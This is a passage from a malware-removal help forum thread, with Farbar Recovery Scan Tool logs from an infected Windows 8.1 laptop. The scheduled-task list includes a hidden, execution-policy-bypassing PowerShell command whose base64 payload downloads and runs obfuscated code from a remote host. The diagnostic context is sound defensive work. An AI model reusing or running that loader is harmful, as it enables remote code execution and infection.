    Task: {4D7C72BC-0587-426B-A153-339DDDE59812} - System32\Tasks\AdGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010D => C:\Program Files\Explore\iexloprer.exe [2016-01-09] (Microsoft)
    Task: {52059878-BC54-47DF-9E6E-CBA49724460E} - System32\Tasks\iuBrowserIEAgent => C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuBrowserIEAgent.exe [2012-08-22] ()
    Task: {568AAEFF-F3D4-49CE-93DF-AFFCF6ADABF0} - System32\Tasks\Foebyyc => C:\PROGRA~1\GROOVE~1\Sovri.bat
    Task: {5D102AA7-504E-4431-A61D-C495A561C3E3} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company)
    Task: {67153154-EDE8-41E9-947F-1251F35B6C8D} - System32\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGYAbwByAGEAbABsAHMAaABvAHAALgBpAG4AZgBvAC8AdQAvAD8AYQA9AEIAVQBUAG0AMwBSAGYAOAAwAHUANABrAEsAVwByAEUAeQBQAHcASwBXAEwAdwBJAHQAWQBlAHAAbQBvAFIAVABIAEkAUABQAC0AawB1AEsAMQBiAFYARABmAHMAWQBUAHcAeQBZAHMAbABTAGYARQBZAGYAOABWAEwATQAwADkAXwAwAF8AZAA2AEsAYwBZAEIANgAyAEwAcwBFAG8ANgBDAHcAbABtAFIAUAAxAEEAMwBSAHEANwBiAEIAbQB2AGcALQBBAGEAVwBxAFcAYgBkAFkANABsAHIATgBCAGwATABYAG8AMAB3ADEAYwBOAGwAaABtAGYAYwBxAGkAYwBmAGgAagBLAHkAaQBGAGUALQBfADkAUgBjADIAcAA3AE4AUgA5AFoAZgBRAF8AegBNAGkANwBUAFoATgBWAEMAWgBaADQANQBYAHEAZABUAEQAWgBxAGUAawB4AFEASgBTAHMARABiAEwAbABxAC0AWABaAGQASwBxAEsAdQB4AGwATwBrAEUAbABVAEwAawBoAGwAcgBhAGYAVABtADUAQwBuAHEAYgBWAE0AcwBYAC0AYgB2AF8AMQBvADYASQBNAFIANQBJAFgAVgBTAGsAWABiAE4ANgBMAGkAcgBsAHYANwBZAE0AdQAxADEAegB1AGUAdQB0AFEATQA1AHcAcgBDAGgALQBqAGkANgBkAHkAYQBRAEQAdQBOADAAeABtAHIAVABrAHAATAB0AHoASwBRAGoAeABwAG4AYgBiAHcAWQBPAFMAVgBJAEsAMgBOAFoAYQBEAFgAdAA5AGoAXwBvAE4ASQB1AE0AZwAzADAAVQA4AFUARAByAE0ATQBhADMANgBiAFQAVwBBAGUARQBoAGcAdQBuAFEAMgB4AEUAeQBsAEgAdgBXAHIATgBrAC0AWQBDAE4AWQBtAFAAegB4AHEAVQA0AHcARQBGADkAUgBsAGYAcgBaADgAQgBEADgAZgBHAHoAMwAwADIAbABfAEMAMABDAHAAZwB0ADYAOQBaAEMAYgBFAEcAZwA3AC0AOAA3AEIAWABvAHIAcgA4AFkAbABXAFYAQgA5AGYANAB0AGQAZgBQAHAAOQByADgAXwA0AEcARgBzADgAQQA5AGEAOQBoAFgAcwB3AGUAcwBFAHgAcwBnAHUAQwBnAGEAZgBvAEsAVQB6AEgAVwBsAGsAUQBzAFQAdgB5AFAAUgBiAE0AbgBlAEEARABJAG8ASAAyAEkAWAA1AEsALQBNAGQASQBkAHcAdwAzAGkAdAA4AFMAOABSAEkAbABMAGsAUQBhAHcAegByAGsAZgBkAG8AUQB0AHgAcgBrADEAQwBoAGkAVAAzADEAQgBoAGoAXwBIAHkAWgBWADkAZABjAFQAbgBJADIAMgBwAE4ARQBjADMAMgBFAHIAeQA2AE0AdgBSAEwAWgBIADkAaABuAHcATQBjAHAAYgAxAEcARgA2ADIAQQBUAHEARwBiAC0AdgBIADIAeQBNAEcAMQBzAHoAcgBtAFEAZQBaADcANABBAFkAQQBkAE4AOQBvAFkAWAA2AHIAbABoAGcAMQBwAFoATQBFAGYAMgBNAGgAdwBRAHMAcQBjAFAAagBwAGsAeQBoAFgAegB4AFMAbwBzAHUAagB5AEgAeQBFAFcAZwBxADUAbgBZAHgAMQBLAHEARwB1AG8AYwB2AE8AdgByAHAAcgBmAGwAZgA5AFcAcgBMAEYAagBWAG8AcQBQAHcAbQA2AC0ASgBmAEcAVwBWAGoAVgAzAFoAOQBVAEEAQwBaAHMASwB2AGcASAB3AEkAeQBxAFIAWgBtAGcANgBJAHIAcwA2AGgAeABCAHUASQA3AGcAVQBWAEcANgBQAEcAUABhAE0AdwBDAHkAcgAwAEMAWQB5AFAAWQBYAFYAQgB0AGwAcQBCAF8ASABNAEQARwBnAFAAdABhAGkAcAB2AEkAcwA4AFkATwBEAGYAUQBLAGwAegBwAHkAZABSAGQAQwAzAE4ATgBhADMAWAA5AHoAMQBPAHUAaQBzAHIAVQBDAGIARABvAE4AOQB5AG0AUgBOAEwAVwBDADcATgBEAFMAcwBGADUAYQBnADQAcQBzAE4AMABfAEIASQB1AGwARgBzADcAcgA0ADQAeQBoADEAaAByAHMAUwAyADkASABKAHIANgB5AGMAaQBHAFcAVgBaAFcAaQBMAHEAUABnAEEAbwA0AGoAMwA4AG0AZgBqAE8ARAA3AGoAMQBqADQAYgBqAFMAZQBBADAAeABmAG8AMABLAEYAZABoAEIARABTAHcATQBoAG8AZABjAEoAZQAxAE0ASQBWAFYATQAxAFIAaABEAEIAMAA1AHYATgAmAGMAPQBrAGoAQQBpADMAeABrAHEAegB2AGsAcgAxAFAAcABNAGkAcABfAEgAUgBkAEsARABkADQAZABPAGMAUQBuAFMAUQBMAF8ALQB5AHYAQwBwAG4AegBsAFoAYgBqADIAVABxADgAYgBsADQAcABuAEQAYgAyADYASwBKAHAAYwBPAEkAcgBUAFoARABhAC0ATQBEADcAegBwAHMARgAyAFgAcABlAE8AeQBwADYAbwBXAFEASQBWAGwATQBPAGsATAA1ADkASwBDAG4AbwA0AGEATQBZADgAbgA4AGoAegBQAFYAWgBXAFEAQgAzADkAZgBfAGcAcgBzAG4ALQA5AFoALQBKAEEAUQAtAFMANgBXADUAcABYAGQAZwBKAEEAZABvAFgAWQA3AGgARABjADEATQBjAEUASwBUAGkANQBrAE8ANQBuAGEAcgB1AHYAagBsAHQASQB5AFQARQBXADUALQBtAEwATwBGAGYASgB4AHcAWABoAGcAaAA0AGkAWQBsAGsAZQAyAHIAMgBLAFEARwBqAEIAbABoAFEAZABzAE0ANgB3AFgAYQAzAHoAWABVAHgARABkADkAbAA2AHQAeAAyAG4ANQA0AG8ANQA5AHEAMABmADcAaABJAFQAUgBHAGwAOQBnAHQANgBBAFMAMABMADAAOQBMAGEAbQBVAEcAZQBRAHkAZQBZAFcAcABoAFUAMQBDAHMAdwBEAGwAdgAzAFEAXwAtAFQATwBZAGMAdAB5AE8AUQA4AGIAOAAtAEIAWgBTAEsARwBFAGsASgA0AHUAOABfADgAVgAzAHoASwBvAHQASABZAEMAMQA5ADgAZQByAHkAagB1ADcAQwAxADEAUQBVAEkAbAA1AFUAQwAzAHQAdwBFAG0AUABGAEoAOAA0AFEAaABFADQARQB6AHYAVQBXAHUAOABFAG4AZQBNAGsAawBrADAAcwBNAFUAeABTAG4AcwBOAGEAZwBaAEcAcQA2AHUAOABqAHEAMQB4AGIAZgBpAGcAegBYAFIAZgBzADUAVgBLAEYAOABIAEgANgA5AEoAUwB0AGMAbQBhAG0ANQBrAGIANwBPADgANgBGAFUAaQBrAEMAQQBPAGwAaAA1AGQARABkAGcAQQB3AF8AbgByAGMAdQA4AEsAbwBEAHoAZwBvAFYASgBLAEwAZQBsADYATABlAFcAVAAyAGUAZgA5AGYARwByAFcAOQA2ADkASAB2AC0ASwB4AHEAcQBhAEMAUwBVADkAcwBOAFEATwBCAHcAeABoADMAWABYAFUANQBBAHMAZgBlAGkAQQA2AE8ARQA2ADQAdABMAHcAZQBIAEcAMgBDAFYATQA0AG0AUwBTAGEAVQBmADAAUgB0AGcAYQAzAGgAVgBIADEAdAB4AEcAZgAtAE0AdQBtAGMAVwAxAEYAeQA4ADUAbQBPAHEAYgBxAEgASQAzADkAeQB6AGMATQBpAHkAOQBRAGUARQBaAE0ARwBUAEoAeQByAE4AZAA1AG4AMwBqADUAcABpAGEAagBCAHAANgBRAGEAUgBrAHAAbABhAGwAZQBfADAAUgBWAHQAbwBTAEoAcgAtAFEAbwBFAHMAYgBwADUAdgBuAEQASQBJAGgAdABjAHQATwBlAEsAaQBsAEYAVAA0ADgAeABXADgARgBzAGMAegBoAGIARwBkAHQANQBlAFMAMABnAG4AcQBtAG4ARQBLAGwARwBqAEcAWABxADUARABWAHAATwBqAEQAdQBDAFoAZAB4AHEAUwBkAFgAcABzAFYATQB2ADIAQgBqAFAAMgBfAGsATwB1AFIAQwA2ADYAbABHADMAZgBGAE4AUQBUAHYAUABaAFkAVQBNAGkAUwAwAFEAZABkADYATAAtAHgAbQA3AGsATgA5AEQANQBVAEYAXwBGAFUAdwBrAEwASwBFADgARQB5ADYAaABhAE8ARABjAFgAVgBaAHcAcwAyAFkAUABtAEEALQBCAGgAOQBOAGUAOABQAGYAdgBtADEAegA0ADkAVgAxADcAdABBADAATQBoAEMAUwBzADAAQQBZAFMAaQBGAGoAbABlAEkAbgA4ADIATwByAHAAYQBmADgARgB1AEwARgBDAHQAeABJAHoANABXADAAbQB0AHAAUABRAFMAdwBSADQASgB5AGEAUABXAEoAVgBMAGYAMABxAEsAdwBxAFQALQByAFkAVABQAFkAYwBvAFcAdQBIAGYAcwBRAEcASABYAEgAaQBBAFkAQQBfAHcAMQBSAFEAdgBOAG4AWgB2AEEAbQBJADcAeQBQAGYAYgBoAFAAaQBhAEMARAB4AFgAZAB5AFQAbQBqAE4ARwBYAG4AbwBkADMAZgAxADcATQBqAEYATQBFAHoAagA0AF8AbABGAG4AdQBkAGYAeABtAHoAcABXAFEANQBsAGYAMwBIACYAcgA9ADcANwA1ADkAOAA3ADUAMgA5ADMAMwA5ADUANgAzADAANAA1ADQAIgA7ACQAcwB0AHMAawA9ACIAewAwAEQAMABGADcARgA0ADcALQAwAEIANwBBAC0AMAA5ADcARgAtADcARQAxADEALQAwADUAMABBADAAOQAwADQAMQAxADcAOAB9ACIAOwAkAHAAcgBpAGQAPQAiAFMAeQBzAHQAZQBtAEgAZQBhAGwAZQByACIAOwAkAGkAbgBpAGQAPQAiAE8ATABWAFoAUwBTAFEATQAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwB9ACQAdgA9AFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuADsACgBpAGYAKAAkAHYALgBNAGEAagBvAHIAIAAtAGUAcQAgADUAKQB7AGkAZgAoACgAJAB2AC4ATQBpAG4AbwByACAALQBsAHQAIAAyACkAIAAtAEEATgBEACAAKAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AUwBlAHIAdgBpAGMAZQBQAGEAYwBrAE0AYQBqAG8AcgBWAGUAcgBzAGkAbwBuACAALQBsAHQAIAAyACkAKQB7AGIAcgBlAGEAawA7AH0AfQAKAGkAZgAoAC0ATgBPAFQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgAiACkAKQB7AGIAcgBlAGEAawA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIAB3AGMAKAAkAHUAcgBsACkAewAkAHIAcQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHIAcQAuAFUAcwBlAEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzAD0AJAB0AHIAdQBlADsAJAByAHEALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAHUAcwBlAHIALQBhAGcAZQBuAHQAIgAsACIATQBvAHoAaQBsAGwAYQAvADQALgAwACAAKABjAG8AbQBwAGEAdABpAGIAbABlADsAIABNAFMASQBFACAANwAuADAAOwAgAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACkAIgApADsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcgBxAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHUAcgBsACkAKQA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIABkAHMAdAByACgAJAByAGEAdwBkAGEAdABhACkAewAkAGIAdAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAByAGEAdwBkAGEAdABhACkAOwAkAGUAeAB0AD0AJABiAHQAWwAwAF0AOwAkAGsAZQB5AD0AJABiAHQAWwAxAF0AIAAtAGIAeABvAHIAIAAxADcAMAA7AGYAbwByACgAJABpAD0AMgA7ACQAaQAgAC0AbAB0ACAAJABiAHQALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAYgB0AFsAJABpAF0APQAoACQAYgB0AFsAJABpAF0AIAAtAGIAeABvAHIAIAAoACgAJABrAGUAeQAgACsAIAAkAGkAKQAgAC0AYgBhAG4AZAAgADIANQA1ACkAKQA7AH0ACgByAGUAdAB1AHIAbgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAkAGIAdAAsADIALAAoACQAYgB0AC4ATABlAG4AZwB0AGgALQAkAGUAeAB0ACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQAKACQAcwBjAD0AZABzAHQAcgAoAHcAYwAoACQAcwB1AHIAbAApACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiACQAcwBjACIAOwB9AGMAYQB0AGMAaAB7AH0AOwBlAHgAaQB0ACAAMAA7AA==
    Task: {680E9242-EA06-4B9A-AD7F-3CB4585120DE} - System32\Tasks\psv_Temptough => /c regedit.exe /s "C:\ProgramData\Medlight\Physronwarm.reg" &amp; del "C:\ProgramData\Medlight\Physronwarm.reg" &amp; SCHTASKS /Delete /TN "psv_Temptough" /F <==== ATTENTION
    Task: {6A06F2E2-A9E3-4D48-8BA2-0A8D99B9B386} - System32\Tasks\System HealerPeriod => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
    Task: {7213CECA-856F-49B0-9BE8-1A0D716FF580} - System32\Tasks\GNU_635879831225933307 => C:\Users\owner\AppData\Roaming\SafeWeb\gsw.exe
    Task: {775F46EB-0A69-4534-BCF9-78E95CFD1A8E} - System32\Tasks\Easy Driver Pro Schedule => C:\Program Files (x86)\Probit Software\Easy Driver Pro\EDPTray.exe
    Task: {850B6F24-BFEA-4BDC-BB72-E7C8F2C5D23E} - System32\Tasks\Opera scheduled Autoupdate 1452386042 => C:\Program Files (x86)\Opera\launcher.exe
    Task: {86C4588C-6DEB-4673-A725-802728388B8C} - System32\Tasks\WebDnsio2-daily => C:\Program Files (x86)\WebDnsio\WebDnsio.exe [2015-11-16] ()
    Task: {889A02E4-9406-4332-950C-98E052F215FD} - System32\Tasks\PMMUpdate => C:\Program Files\EgisTec IPS\PMMUpdate.exe [2012-07-11] (Egis Technology Inc.)
    Task: {8941FF4A-455A-4F4B-9F2E-1DCD660A1FDE} - System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010 => C:\Program Files\Task Host\taskhost.exe [2016-01-09] (Microsoft)
    Task: {92D813B2-AA5B-4A97-93B5-19CC0A69B867} - \One System Care Task -> No File <==== ATTENTION
    Task: {9DDA3311-9424-4D32-902F-22A85EE0905D} - System32\Tasks\LSNHDG1 => C:\ProgramData\FlashBeat\FlashBeat.exe <==== ATTENTION
    Task: {A23E1D8E-B2C8-4179-8E36-5F1D94FEB50A} - System32\Tasks\GenericSettingsHandler\Windows-Credentials\RetrySyncTask_for_S-1-5-21-3773202632-424774445-890114178-1001
    Task: {A4561249-F93C-42DD-9156-9C763476AE13} - System32\Tasks\ALUAgent => C:\Program Files (x86)\Acer\Live Updater\liveupdater_agent.exe [2012-06-21] ()
    Task: {A477CF67-A8F7-4DE2-B002-921BDC79B211} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-07] (Google Inc.)
    Task: {A56409DE-600B-4BC0-9A96-DF01E8D4AA28} - System32\Tasks\psv_Tripplezap => /c regedit.exe /s "C:\ProgramData\Medlight\Kay-Ity.reg" &amp; del "C:\ProgramData\Medlight\Kay-Ity.reg" &amp; SCHTASKS /Delete /TN "psv_Tripplezap" /F <==== ATTENTION
    Task: {A6208F98-D826-4652-BF83-E7D44CA2A837} - \DNSARCHBOLD -> No File <==== ATTENTION
    Task: {AAEA193D-3DD3-4D12-B57E-AD3C71C7F783} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-12-08] (Piriform Ltd)
    Task: {AF2DA830-E9A5-4C18-9C70-0913A510B21C} - \One System CarePeriod -> No File <==== ATTENTION
    Task: {AFB865ED-9145-4839-81CC-EB2D84F61DFB} - System32\Tasks\ZcGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412 => C:\Program Files\IIS\iis.exe [2016-01-09] (Microsoft)
    Task: {B3552ACF-EA18-40A2-9D83-B3EBA7173A0C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2015-09-27] (Hewlett-Packard)
    Task: {B62A1854-5E8B-4971-A249-401D4464FF54} - System32\Tasks\iuEmailOutlookAgent => C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuEmailOutlookAgent.exe [2012-08-22] ()
    Task: {BA48FCCD-F364-42BF-B684-E7B4DCC4D3D1} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
    Task: {BBCA6AF3-1387-4A66-837F-B9936560FBB0} - System32\Tasks\Olunnuag => C:\ProgramData\Olunnuag\1.0.7.1\evmihlus.exe
    Task: {BD4E8E43-4441-4A4B-8137-BE0060B0F289} - System32\Tasks\EgisUpdate => C:\Program Files\EgisTec IPS\EgisUpdate.exe [2012-07-11] (Egis Technology Inc.)
    Task: {C0596212-D5EE-44AF-AAAB-07C61EDA0EC5} - \Taplika nise -> No File <==== ATTENTION
    Task: {C80AA8E6-C6C0-4160-B234-B2589888E728} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-12-28] (Adobe Systems Incorporated)
    Task: {CFC03435-6807-4B22-8F28-92616C6160D2} - System32\Tasks\DriverNavigator Scheduled Scan => C:\Program Files\Easeware\DriverNavigator\DriverNavigator.exe
    Task: {D0395F3B-097A-47A4-A07D-D3977F7D3FD0} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-10-28] (Adobe Systems Incorporated)
    Task: {D1BE1EA4-7412-4A4B-9468-76D0C35F4DE6} - System32\Tasks\Power Management => C:\Program Files\Acer\Acer Power Management\ePowerTray.exe [2012-08-22] (Acer Incorporated)
    Task: {D1D5F7D9-DFF0-4F73-BE19-8BA1E5BA3000} - System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010P => C:\WINDOWS\system32\WindowsPowerShell\taskprocess.exe [2016-01-09] (gltstech.net)
    Task: {DBE9B34A-58C0-4CC7-B79B-D7498B9DD164} - System32\Tasks\SystemHealer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe
    Task: {DC75A548-011F-44B6-AE74-CDA52157237D} - System32\Tasks\WebDnsio2 => C:\Program Files (x86)\WebDnsio\WebDnsio.exe [2015-11-16] ()
    Task: {E06DA7D4-9D01-4CBE-80C7-A4BFD6357661} - System32\Tasks\Goose => C:\Users\owner\AppData\Local\Birds\Settings\goose.dll.dll [2016-01-09] (Birds365)
    Task: {F975168C-909D-4C2D-8BC0-CFD9AC8553A4} - System32\Tasks\UXJOVQQVBISGUWLJ => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION

    (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

    Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
    Task: C:\WINDOWS\Tasks\DriverNavigator Scheduled Scan.job => C:\Program Files\Easeware\DriverNavigator\DriverNavigator.exe
    Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
    Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
    Task: C:\WINDOWS\Tasks\Goose.job => C:\Users\owner\AppData\Local\Birds\Settings\goose.dll.dll
    Task: C:\WINDOWS\Tasks\System HealerPeriod.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
    Task: C:\WINDOWS\Tasks\System HealerStartUp.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
    Task: C:\WINDOWS\Tasks\UXJOVQQVBISGUWLJ.job => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
    Task: C:\WINDOWS\Tasks\{0B7F0947-7E7A-0B05-7E11-797A790F110F}.job => powershell exe
    Task: C:\WINDOWS\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178}.job => powershell exe

    ==================== Shortcuts =============================

    (The entries could be listed to be restored or removed.)
     
  18. Broni

    Broni Malware Annihilator Posts: 52,890   +344

    On a top of very heavy infection we also have one system file infected so I need to see if we have any healthy replacement.

    Re-run FRST again.
    Type the following in the edit box after "Search:".

    dnsapi.dll

    Click Search files button and post the log (Search.txt) it makes in your reply.
     
  19. Broni

    Broni Malware Annihilator Posts: 52,890   +344

    You missed a part of Addition.txt log just below this:

    so I'll need that too.
     
  20. Gitanjali

    Gitanjali TS Rookie Topic Starter Posts: 83

    Sorry about the overlap - seems you gave me additional instructions but I didn't get them till after I posted the first log. I'll restart again with your additional instructions. Thx :)
     
  21. Broni

    Broni Malware Annihilator Posts: 52,890   +344

    You don't need to restart to get those two things I need.
     
  22. Gitanjali

    Gitanjali TS Rookie Topic Starter Posts: 83

    So I looked at the Additional text log and there's nothing after it but I'll recopy if you'd like - just advise. Also, I reran it as per your instructions and have the search text log copied first (below) then the next will be the FRST log.

    Farbar Recovery Scan Tool (x64) Version:10-01-2015 01
    Ran by owner (2016-01-10 19:22:38)
    Running from E:\
    Boot Mode: Safe Mode (minimal)

    ================== Search Files: "dnsapi.dll" =============

    C:\Windows\WinSxS\wow64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17481_none_909ba85d2b802d18\dnsapi.dll
    [2015-01-23 12:05][2014-11-04 17:20] 0498688 ____N (Microsoft Corporation) 205BDB00F4C032AF45A6BFD18EA7886C [File is digitally signed]

    C:\Windows\WinSxS\wow64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17415_none_90eb58f92b43cedd\dnsapi.dll
    [2014-11-21 01:16][2015-03-30 20:19] 0000202 ____A () D06D08FC499336D17F6E9F6E05847576 [File not signed]

    C:\Windows\WinSxS\amd64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17481_none_8646fe0af71f6b1d\dnsapi.dll
    [2015-01-23 12:05][2014-11-04 17:44] 0657920 ____N (Microsoft Corporation) 0B082D6D7A53D91678E7409DD145E89C [File is digitally signed]

    C:\Windows\WinSxS\amd64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_6.3.9600.17415_none_8696aea6f6e30ce2\dnsapi.dll
    [2014-11-21 01:15][2015-03-29 13:33] 0000206 ____A () 056816A63C5C311231348A5F56F0A496 [File not signed]

    C:\Windows\SysWOW64\dnsapi.dll
    [2015-01-23 12:05][2015-01-23 12:05] 0498688 ____A (Microsoft Corporation) 27EE78502A66B4B9E4BD66C5FD081B59 [File not signed]

    C:\Windows\System32\dnsapi.dll
    [2015-01-23 12:05][2015-01-23 12:05] 0657920 ____A (Microsoft Corporation) 261452CF5C52EB6514A005FDCC7EDA12 [File not signed]

    ====== End of Search ======
     
  23. Gitanjali

    Gitanjali TS Rookie Topic Starter Posts: 83

    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:10-01-2015 01
    Ran by owner (administrator) on ACER (10-01-2016 19:30:04)
    Running from E:\
    Loaded Profiles: owner (Available Profiles: owner)
    Platform: Windows 8.1 (X64) Language: English (United States)
    Internet Explorer Version 11 (Default browser not detected!)
    Boot Mode: Safe Mode (minimal)
